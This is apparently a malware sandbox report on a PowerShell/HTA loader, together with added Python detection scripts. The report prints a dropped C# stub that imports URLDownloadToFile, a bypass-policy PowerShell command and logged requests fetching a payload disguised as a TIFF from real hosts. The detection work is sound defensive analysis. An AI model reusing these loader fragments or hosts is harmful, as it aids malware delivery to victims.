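            "output_dll": m.group("out"),
            # Add-Type always references the PowerShell engine assembly.
            "references_automation": "System.Management.Automation" in e.cmdline,
            # csc.exe invokes cvtres.exe to build the version resource (RES*.tmp above).
            "cvtres_child": any(_base(c.image) == "cvtres.exe" for c in children.get(e.pid, [])),
        })
    return findings


def native_imports(source: str):
    """(dll, function) pairs declared via [DllImport] in a C# source; dll name lower-cased."""
    return [(m.group("dll").lower(), m.group("func")) for m in DLLIMPORT_RE.finditer(source)]


def download_primitives(source: str):
    """Subset of native_imports() that are known file-download APIs."""
    return [(d, f) for d, f in native_imports(source) if (d, f.lower()) in DOWNLOAD_PRIMITIVES]


# Constructed process-creation events. The csc.exe command line is the one recorded in the report;
# the surrounding pids, the benign msbuild/csc pair and the developer's csc call are made up.
CSC_CMD = r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\w0uathue\w0uathue.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\w0uathue\w0uathue.0.cs"'
SAMPLE_EVENTS = [
    ProcEvent(2000, 1500, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe", "powershell.exe -ep bypass ..."),
    ProcEvent(3000, 2000, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe", CSC_CMD),
    ProcEvent(3100, 3000, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe",
              r'cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2022.tmp"'),
    ProcEvent(4000, 3900, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe", "msbuild.exe App.csproj"),
    ProcEvent(4100, 4000, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe", r"csc.exe /noconfig /target:library /out:obj\Debug\App.dll Program.cs"),
    ProcEvent(5000, 1500, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell.exe"),
    ProcEvent(5100, 5000, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe", r'csc.exe /out:"C:\dev\hello.exe" "C:\dev\hello.cs"'),
]

# The dropped w0uathue.0.cs stub from the report, with its line breaks restored.
SAMPLE_SOURCE = """using System;
using System.Runtime.InteropServices;
namespace yqaLWfmp
{
    public class cTn
    {
        [DllImport("UrLMon.dLL", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr jl,string yNzxn,string tYuY,uint QjUWlwdaCZW,IntPtr wA);
    }
}"""

if __name__ == "__main__":
    for f in find_add_type_chains(SAMPLE_EVENTS):
        print("Add-Type compile chain:", f)
    print("download primitives in stub:", download_primitives(SAMPLE_SOURCE))
```

The two developer-style csc.exe invocations in the sample are deliberately not flagged: the first has msbuild.exe as parent, the second is launched from PowerShell but does not use the %TEMP%\<dir>\<dir>.0.cs layout, so the rule keys on the Add-Type artifact layout rather than on "PowerShell spawned a compiler". On a real host the powershell.exe command line and the hash of the produced DLL would be attached to the finding.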
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:Unicode text, UTF-16, little-endian text, with very long lines (431), with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):165320
                                                                          Entropy (8bit):3.9154650100951054
                                                                          Encrypted:false
                                                                          SSDEEP:3072:cQKStd/roV5KEwdQKStd/roV5KEwzQKStd/roV5KEwt:hK2d/rY5KBuK2d/rY5KBsK2d/rY5KBt
                                                                          MD5:5BE16D230E88F7D40E09E2E938446071
                                                                          SHA1:668C33BA360AE4E37B8C440DA266F5CFAFCD4750
                                                                          SHA-256:B7390070E99BA85CF154363319100F6D6E201CB6570C90C6FC132F16CB218AE0
                                                                          SHA-512:8EC25D49B3065689B779D1AE5993CA2DF3608DF81648479F138C47CB7B51D92D9DA73B4E39C910EB0EE0D88297BA93B0E2B77B58B1B927F5D9A79AE1AB66E651
                                                                          Malicious:true
                                                                          Preview:..........U.I.K.p.Z.P.R.v.l.e.L.i.m.n.z. .=. .".q.U.i.m.W.f.A.L.a.c.I.C.H.l.g.".....p.b.t.L.W.U.h.L.W.B.U.s.r.p.W. .=. .".k.U.G.i.K.p.x.L.q.P.x.j.C.p.b.".....W.k.h.i.p.Z.l.W.n.h.z.n.p.W.q. .=. .".h.W.a.L.A.c.v.j.U.q.N.k.W.B.J.".....G.G.h.Z.U.K.z.n.A.z.d.b.m.h.l. .=. .".q.o.G.Z.U.W.U.B.i.T.q.K.P.i.i.".....i.v.m.o.d.K.L.B.U.h.W.k.L.i.G. .=. .".k.i.d.p.U.L.u.L.P.U.k.O.W.B.N.".....e.R.B.U.f.W.U.n.g.c.L.i.A.Z.t. .=. .".b.i.G.J.d.Q.K.O.S.J.f.d.f.b.j.".........Z.l.l.B.W.A.W.W.P.R.i.g.c.W.W. .=. .".e.W.c.h.z.G.K.R.p.a.H.i.U.K.L.".....k.m.O.W.j.h.W.z.l.B.L.N.b.T.C. .=. .".W.C.H.S.C.i.K.W.t.U.S.L.W.B.c.".....J.N.Z.l.e.G.A.i.H.W.G.o.z.m.i. .=. .".d.c.O.f.O.L.t.t.t.l.u.r.K.e.L.".........c.W.d.c.P.r.Q.f.I.n.Q.z.f.r.K. .=. .".B.T.G.o.U.q.f.C.o.z.g.t.e.x.k.".....k.i.u.m.u.o.b.h.h.Z.i.c.x.G.b. .=. .".U.W.I.W.p.i.J.u.s.O.m.f.S.c.a.".....b.G.g.m.e.L.k.W.l.A.C.L.R.U.A. .=. .".a.a.Z.t.c.Q.N.W.i.W.b.o.z.m.L.".....C.n.o.W.U.W.h.i.e.L.i.P.u.T.t. .=. .".u.c.a.r.t.a.p.e.l.e.U.A.p.f.W.i.A.C.W.L.k.G.".....s.U.o.
                                                                          File type:HTML document, ASCII text, with very long lines (65536), with no line terminators
                                                                          Entropy (8bit):2.3056895883292174
                                                                          TrID:
                                                                            File name:greatthingetniretimewithgoodnewgivenwhichgiventhnseethebest.hta
                                                                            File size:221'045 bytes
                                                                            MD5:af5174392d590a5b515ab1dcacfc79c6
                                                                            SHA1:28697fe6ef17f0a714e89505495d60e10b40b8f3
                                                                            SHA256:a09dc85606cb624d221defe49d7df873af0064acb6e81d14ba646c1aa38936ee
                                                                            SHA512:c4e2c01a2838631ca96b6c193377e6c4cc319f1a5a4e2cfc34e24411b0acaddcb998953da4522e69ea332f44791514cbd6f58e64665227c890c02bf6f6c913ed
                                                                            SSDEEP:1536:RZ7yZCdWybXhUsBA7MoNfEOOcSj0CdWybXhUJBA7MoNfEOOcSj6yztFuZggxdxp+:Ra
                                                                            TLSH:AE24DB419D240069FBFD9E96ADEDF74F3574221EDACD9D8D4327BA80DCA228F644098C
                                                                            File Content Preview:<script language=JavaScript>m='%3Cscript%20language%3DJavaScript%3Em%3D%27%253Cscript%2520language%253DJavaScript%253Em%253D%2527%25253CScript%252520Language%25253D%252527Javascript%252527%25253E%25250A%25253C%252521--%252520HTML%252520Encryption%252520pr
                                                                            Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                                                            2024-11-28T07:18:04.397158+0100 | 2858795 | ETPRO MALWARE ReverseLoader Payload Request (GET) M2 | 1 | 192.168.2.4 | 49730 | 23.95.128.215 | 80 | TCP
                                                                            Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                            Nov 28, 2024 07:18:05.060615063 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:05.060672045 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:05.060709953 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:05.060749054 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:05.064049006 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:05.064097881 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:05.064132929 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:05.064172029 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:05.067486048 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:05.067538977 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:05.067567110 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:05.067605019 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:05.070949078 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:05.070998907 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:05.071041107 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:05.071086884 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:05.074377060 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:05.074419975 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:05.074487925 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:05.074527979 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:05.077822924 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:05.077866077 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:05.077900887 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:05.077936888 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:05.081250906 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:05.081300020 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:05.081331015 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:05.081373930 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:05.084688902 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:05.084734917 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:05.084799051 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:05.084837914 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:05.088105917 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:05.088156939 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:05.088229895 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:05.088277102 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:05.091595888 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:05.091660023 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:05.091665030 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:05.091706991 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:05.094969988 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:05.095022917 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:05.095093966 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:05.095136881 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:05.098431110 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:05.098478079 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:05.098534107 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:05.098575115 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:05.101836920 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:05.101885080 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:09.424225092 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:09.424293041 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:10.173002958 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 28, 2024 07:18:10.173054934 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 28, 2024 07:18:10.173125029 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 28, 2024 07:18:10.183624983 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 28, 2024 07:18:10.183640957 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 28, 2024 07:18:12.075308084 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 28, 2024 07:18:12.075393915 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 28, 2024 07:18:12.078290939 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 28, 2024 07:18:12.078303099 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 28, 2024 07:18:12.078636885 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 28, 2024 07:18:12.106770039 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 28, 2024 07:18:12.151330948 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 28, 2024 07:18:12.531342030 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 28, 2024 07:18:12.531596899 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 28, 2024 07:18:12.531884909 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 28, 2024 07:18:12.540128946 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 28, 2024 07:18:14.165100098 CET4973080192.168.2.423.95.128.215
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 28, 2024 07:18:09.828231096 CET | 57101 | 53 | 192.168.2.4 | 1.1.1.1
Nov 28, 2024 07:18:10.166172028 CET | 53 | 57101 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 28, 2024 07:18:09.828231096 CET | 192.168.2.4 | 1.1.1.1 | 0xb7ce | Standard query (0) | 3105.filemail.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 28, 2024 07:18:10.166172028 CET | 1.1.1.1 | 192.168.2.4 | 0xb7ce | No error (0) | 3105.filemail.com | ip.3105.filemail.com |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 28, 2024 07:18:10.166172028 CET | 1.1.1.1 | 192.168.2.4 | 0xb7ce | No error (0) | ip.3105.filemail.com |  | 193.30.119.205 | A (IP address) | IN (0x0001) | false
                                                                            • 3105.filemail.com
                                                                            • 23.95.128.215
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 23.95.128.215 | 80 | 6248 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Nov 28, 2024 07:18:03.235958099 CET | 326 | OUT | GET /226/seethepossiblethingsforentiretimetogivemebest.tIF HTTP/1.1
                                                                            Accept: */*
                                                                            Accept-Encoding: gzip, deflate
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                            Host: 23.95.128.215
                                                                            Connection: Keep-Alive
Nov 28, 2024 07:18:04.397062063 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                            Date: Thu, 28 Nov 2024 06:18:04 GMT
                                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                                            Last-Modified: Tue, 26 Nov 2024 03:30:17 GMT
                                                                            ETag: "285c8-627c877d442cc"
                                                                            Accept-Ranges: bytes
                                                                            Content-Length: 165320
                                                                            Keep-Alive: timeout=5, max=100
                                                                            Connection: Keep-Alive
                                                                            Content-Type: image/tiff
                                                                            Data Raw: ff fe 0d 00 0a 00 0d 00 0a 00 55 00 49 00 4b 00 70 00 5a 00 50 00 52 00 76 00 6c 00 65 00 4c 00 69 00 6d 00 6e 00 7a 00 20 00 3d 00 20 00 22 00 71 00 55 00 69 00 6d 00 57 00 66 00 41 00 4c 00 61 00 63 00 49 00 43 00 48 00 6c 00 67 00 22 00 0d 00 0a 00 70 00 62 00 74 00 4c 00 57 00 55 00 68 00 4c 00 57 00 42 00 55 00 73 00 72 00 70 00 57 00 20 00 3d 00 20 00 22 00 6b 00 55 00 47 00 69 00 4b 00 70 00 78 00 4c 00 71 00 50 00 78 00 6a 00 43 00 70 00 62 00 22 00 0d 00 0a 00 57 00 6b 00 68 00 69 00 70 00 5a 00 6c 00 57 00 6e 00 68 00 7a 00 6e 00 70 00 57 00 71 00 20 00 3d 00 20 00 22 00 68 00 57 00 61 00 4c 00 41 00 63 00 76 00 6a 00 55 00 71 00 4e 00 6b 00 57 00 42 00 4a 00 22 00 0d 00 0a 00 47 00 47 00 68 00 5a 00 55 00 4b 00 7a 00 6e 00 41 00 7a 00 64 00 62 00 6d 00 68 00 6c 00 20 00 3d 00 20 00 22 00 71 00 6f 00 47 00 5a 00 55 00 57 00 55 00 42 00 69 00 54 00 71 00 4b 00 50 00 69 00 69 00 22 00 0d 00 0a 00 69 00 76 00 6d 00 6f 00 64 00 4b 00 4c 00 42 00 55 00 68 00 57 00 6b 00 4c 00 69 00 47 00 20 00 [TRUNCATED]
                                                                            Data Ascii: UIKpZPRvleLimnz = "qUimWfALacICHlg"pbtLWUhLWBUsrpW = "kUGiKpxLqPxjCpb"WkhipZlWnhznpWq = "hWaLAcvjUqNkWBJ"GGhZUKznAzdbmhl = "qoGZUWUBiTqKPii"ivmodKLBUhWkLiG = "kidpULuLPUkOWBN"eRBUfWUngcLiAZt = "biGJdQKOSJfdfbj"ZllBWAWWPRigcWW = "eWchzGKRpaHiUKL"kmOWjhWzlBLNbTC = "WCHSCiKWtUSLWBc"JNZleGAiHWGozmi = "dcOfOLtttlurKeL"cWdcPrQfInQzfrK = "BTGoUqfCozgtexk"kiumuobhhZicxGb = "UWIWpiJusOmfSca"bGgmeLkWlACLRUA = "aaZtcQNWiWbozmL"CnoWUWhi
Nov 28, 2024 07:18:04.397172928 CET | 224 | IN | Data Raw: 00 65 00 4c 00 69 00 50 00 75 00 54 00 74 00 20 00 3d 00 20 00 22 00 75 00 63 00 61 00 72 00 74 00 61 00 70 00 65 00 6c 00 65 00 55 00 41 00 70 00 66 00 57 00 69 00 41 00 43 00 57 00 4c 00 6b 00 47 00 22 00 0d 00 0a 00 73 00 55 00 6f 00 70 00 4b
                                                                            Data Ascii: eLiPuTt = "ucartapeleUApfWiACWLkG"sUopKLUiOiKZLLk = "drvbiiuexbxbSQi"UbxgauiWBcKWLRG = "lPiWKbKfLxqNClA"Lf
Nov 28, 2024 07:18:04.397182941 CET | 1236 | IN | Data Raw: 00 78 00 7a 00 4c 00 66 00 41 00 69 00 62 00 71 00 41 00 52 00 64 00 78 00 75 00 20 00 3d 00 20 00 22 00 66 00 4c 00 7a 00 66 00 69 00 57 00 57 00 68 00 75 00 6f 00 64 00 48 00 50 00 5a 00 4b 00 22 00 0d 00 0a 00 4c 00 47 00 6c 00 69 00 43 00 57
                                                                            Data Ascii: xzLfAibqARdxu = "fLzfiWWhuodHPZK"LGliCWcLzAliWaU = "mZlLOihKcKzdcLt"LLAIPuccGlNelOi = "UbUhpJRZktUqnrL"iasitAtvLWjq
Nov 28, 2024 07:18:04.397247076 CET | 1236 | IN | Data Raw: 00 5a 00 75 00 4c 00 4c 00 57 00 69 00 5a 00 4c 00 6b 00 7a 00 22 00 0d 00 0a 00 61 00 65 00 57 00 4b 00 72 00 47 00 43 00 41 00 4e 00 68 00 4c 00 5a 00 6b 00 4b 00 70 00 20 00 3d 00 20 00 22 00 64 00 68 00 54 00 4f 00 55 00 70 00 52 00 63 00 4b
                                                                            Data Ascii: ZuLLWiZLkz"aeWKrGCANhLZkKp = "dhTOUpRcKLKHLLL"LiAQhcbaoLRhLpS = "WKNcOqLPWWnPIuZ"cLUKmlkWAGLbAzR = "PczBheofWKzNikL
Nov 28, 2024 07:18:04.397258997 CET | 1236 | IN | Data Raw: 00 42 00 66 00 62 00 47 00 20 00 3d 00 20 00 22 00 6a 00 4c 00 6c 00 4b 00 70 00 74 00 66 00 5a 00 6d 00 51 00 68 00 69 00 6c 00 66 00 70 00 22 00 0d 00 0a 00 70 00 69 00 74 00 65 00 63 00 54 00 4c 00 57 00 6c 00 69 00 74 00 69 00 47 00 48 00 6a
                                                                            Data Ascii: BfbG = "jLlKptfZmQhilfp"pitecTLWlitiGHj = "NKniQIcUBBncCCA"GGzpveOnofmLoLQ = "GvioLGnWRqoZWos"iomWhBaLNNzWWjk = "
Nov 28, 2024 07:18:04.397506952 CET | 1236 | IN | Data Raw: 00 55 00 74 00 4c 00 66 00 6f 00 55 00 69 00 75 00 22 00 0d 00 0a 00 61 00 49 00 55 00 73 00 57 00 62 00 69 00 69 00 78 00 62 00 64 00 41 00 41 00 4b 00 4c 00 20 00 3d 00 20 00 22 00 72 00 71 00 52 00 67 00 66 00 4f 00 70 00 4c 00 4c 00 65 00 50
                                                                            Data Ascii: UtLfoUiu"aIUsWbiixbdAAKL = "rqRgfOpLLePmAbe"SOqqcSzKtoiUKcq = "bBHpckLzLfAziZK"tkcBzLLGkzdLWgL = "dPWTNlUfCZSKaLZ"
Nov 28, 2024 07:18:04.397517920 CET | 1236 | IN | Data Raw: 00 65 00 4e 00 6d 00 65 00 20 00 3d 00 20 00 22 00 42 00 54 00 4c 00 74 00 41 00 63 00 73 00 41 00 66 00 65 00 65 00 4c 00 41 00 61 00 43 00 22 00 0d 00 0a 00 4c 00 63 00 63 00 4c 00 4e 00 6f 00 5a 00 57 00 57 00 41 00 6d 00 4e 00 75 00 57 00 69
                                                                            Data Ascii: eNme = "BTLtAcsAfeeLAaC"LccLNoZWWAmNuWi = "BNILAzmGnLqxpko"uLTbicNUWriGSOJ = "KNOihkxWcWfPkKc"WAehWPfUcLILKhm = "Lf
Nov 28, 2024 07:18:04.397528887 CET | 1236 | IN | Data Raw: 00 4b 00 5a 00 4c 00 53 00 43 00 4e 00 22 00 0d 00 0a 00 6b 00 6f 00 4b 00 74 00 4b 00 73 00 41 00 55 00 66 00 4e 00 55 00 57 00 64 00 55 00 6c 00 20 00 3d 00 20 00 22 00 78 00 65 00 41 00 4c 00 57 00 75 00 63 00 53 00 64 00 70 00 47 00 68 00 69
                                                                            Data Ascii: KZLSCN"koKtKsAUfNUWdUl = "xeALWucSdpGhioG"fILazqOxKOLcZmj = "OkZWkqOPeGKWPcP"LxLfWGesedOKcKk = "WWANPBWLULezGGH"
Nov 28, 2024 07:18:04.397540092 CET | 1236 | IN | Data Raw: 00 69 00 6f 00 64 00 6b 00 6d 00 4b 00 4e 00 75 00 6d 00 20 00 3d 00 20 00 22 00 62 00 55 00 4b 00 47 00 54 00 57 00 69 00 57 00 71 00 78 00 48 00 50 00 47 00 57 00 52 00 22 00 0d 00 0a 00 43 00 67 00 50 00 4b 00 6e 00 6c 00 67 00 74 00 57 00 52
                                                                            Data Ascii: iodkmKNum = "bUKGTWiWqxHPGWR"CgPKnlgtWRWAUbz = "ZKLILRnheJcCnWG"WUmdLcAtikqmGZC = "AozdAvmLoOmdPWK"iUzKULToKOmqGLf
Nov 28, 2024 07:18:04.397550106 CET | 1236 | IN | Data Raw: 00 6a 00 4c 00 7a 00 68 00 62 00 68 00 22 00 0d 00 0a 00 4b 00 4b 00 4e 00 42 00 4c 00 4e 00 42 00 57 00 6a 00 71 00 7a 00 57 00 6d 00 67 00 63 00 20 00 3d 00 20 00 22 00 4e 00 51 00 7a 00 4b 00 6a 00 5a 00 42 00 6d 00 6e 00 78 00 68 00 6d 00 57
                                                                            Data Ascii: jLzhbh"KKNBLNBWjqzWmgc = "NQzKjZBmnxhmWpk"BkLnLqxGdiKAfhz = "ihUNiOzSnLmUPcj"WcfiiiTcdnBcbdi = "OWbCCWkUPPlJNKL"k
Nov 28, 2024 07:18:04.517149925 CET | 1236 | IN | Data Raw: 00 20 00 3d 00 20 00 22 00 7a 00 57 00 6e 00 65 00 69 00 69 00 6f 00 4c 00 70 00 63 00 57 00 41 00 69 00 63 00 63 00 22 00 0d 00 0a 00 4c 00 6e 00 68 00 57 00 62 00 4c 00 7a 00 4c 00 4c 00 66 00 4b 00 43 00 47 00 4e 00 42 00 20 00 3d 00 20 00 22
                                                                            Data Ascii: = "zWneiioLpcWAicc"LnhWbLzLLfKCGNB = "HUfcdeSlLBiLPKf"AzLWknOalkbkKkr = "fbiWmGiaaWWaGxL"hmcNxmLZinRlcUk = "WlkL
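
The response above declares Content-Type: image/tiff, but the body begins with the UTF-16LE byte-order mark ff fe and decodes to script-style variable assignments (the Data Ascii column shows them), so the .tIF extension and MIME type are a disguise. As an added example that is not part of the Joe Sandbox report, the following Python takes the first bytes of the hex dump shown above, checks them against the TIFF magic numbers, detects the BOM, decodes the text and extracts the assignments; the content-type check then flags the mismatch. The hex input is copied from the report's Data Raw column; the helper names, the TIFF magic values and the assignment pattern are my own.

```python
import codecs
import re

# Hex dump copied from the "Data Raw" column of the HTTP response above (first bytes only).
SAMPLE_HEX = (
    "ff fe 0d 00 0a 00 0d 00 0a 00 55 00 49 00 4b 00 70 00 5a 00 50 00 52 00 76 00 6c 00 65 00 "
    "4c 00 69 00 6d 00 6e 00 7a 00 20 00 3d 00 20 00 22 00 71 00 55 00 69 00 6d 00 57 00 66 00 "
    "41 00 4c 00 61 00 63 00 49 00 43 00 48 00 6c 00 67 00 22 00 0d 00 0a 00 70 00 62 00 74 00 "
    "4c 00 57 00 55 00 68 00 4c 00 57 00 42 00 55 00 73 00 72 00 70 00 57 00 20 00 3d 00 20 00 "
    "22 00 6b 00 55 00 47 00 69 00 4b 00 70 00 78 00 4c 00 71 00 50 00 78 00 6a 00 43 00 70 00 "
    "62 00 22 00 0d 00 0a 00"
)
DECLARED_CONTENT_TYPE = "image/tiff"   # value of the Content-Type header above

# A real TIFF starts with a byte-order marker and the magic number 42 (little- or big-endian).
TIFF_MAGIC = (b"II*\x00", b"MM\x00*")
# Text encodings we can identify from a byte-order mark alone.
BOMS = (
    (codecs.BOM_UTF16_LE, "utf-16-le"),
    (codecs.BOM_UTF16_BE, "utf-16-be"),
    (codecs.BOM_UTF8, "utf-8-sig"),
)
# One `name = "value"` assignment per line, as seen in the decoded body.
ASSIGNMENT = re.compile(r'^(\w+)\s*=\s*"([^"]*)"\s*$', re.M)


def hexdump_to_bytes(dump: str) -> bytes:
    """Turn a whitespace-separated hex dump into raw bytes."""
    return bytes.fromhex("".join(dump.split()))


def detect_text_encoding(data: bytes):
    """Return the encoding name implied by a leading BOM, or None if there is none."""
    for bom, name in BOMS:
        if data.startswith(bom):
            return name
    return None


def sniff_payload(dump: str, declared_type: str) -> dict:
    """Compare what the server claims the body is with what the bytes actually are."""
    data = hexdump_to_bytes(dump)
    is_tiff = data.startswith(TIFF_MAGIC)
    encoding = detect_text_encoding(data)
    text = ""
    if encoding:
        # The BOM-aware codecs consume the marker, so the decoded text starts with the payload.
        text = data.decode("utf-16" if encoding.startswith("utf-16") else "utf-8-sig")
    assignments = dict(ASSIGNMENT.findall(text))
    return {
        "declared_type": declared_type,
        "is_tiff": is_tiff,
        "encoding": encoding,
        "assignments": assignments,
        # An image/* body that is not a TIFF, or that carries a text BOM, is lying about its type.
        "mismatch": declared_type.lower().startswith("image/") and (not is_tiff or encoding is not None),
    }


if __name__ == "__main__":
    result = sniff_payload(SAMPLE_HEX, DECLARED_CONTENT_TYPE)
    print("declared:", result["declared_type"], "| TIFF magic:", result["is_tiff"],
          "| text BOM:", result["encoding"], "| mismatch:", result["mismatch"])
    for name, value in result["assignments"].items():
        print(f"  {name} = {value!r}")
```

The same check applied to a genuine TIFF header (49 49 2a 00 ...) reports is_tiff True and no mismatch, so the function distinguishes a mislabelled script from an ordinary image download rather than flagging every image/tiff response.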


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49731 | 193.30.119.205 | 443 | 2492 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-28 06:18:12 UTC | 211 | OUT | GET /api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c HTTP/1.1
                                                                            Host: 3105.filemail.com
                                                                            Connection: Keep-Alive
2024-11-28 06:18:12 UTC | 234 | IN | HTTP/1.1 500 Internal Server Error
                                                                            Cache-Control: no-cache,no-store
                                                                            Pragma: no-cache
                                                                            Transfer-Encoding: chunked
                                                                            Content-Type: application/json; charset=utf-8
                                                                            Expires: -1
                                                                            Date: Thu, 28 Nov 2024 06:18:12 GMT
                                                                            Connection: close
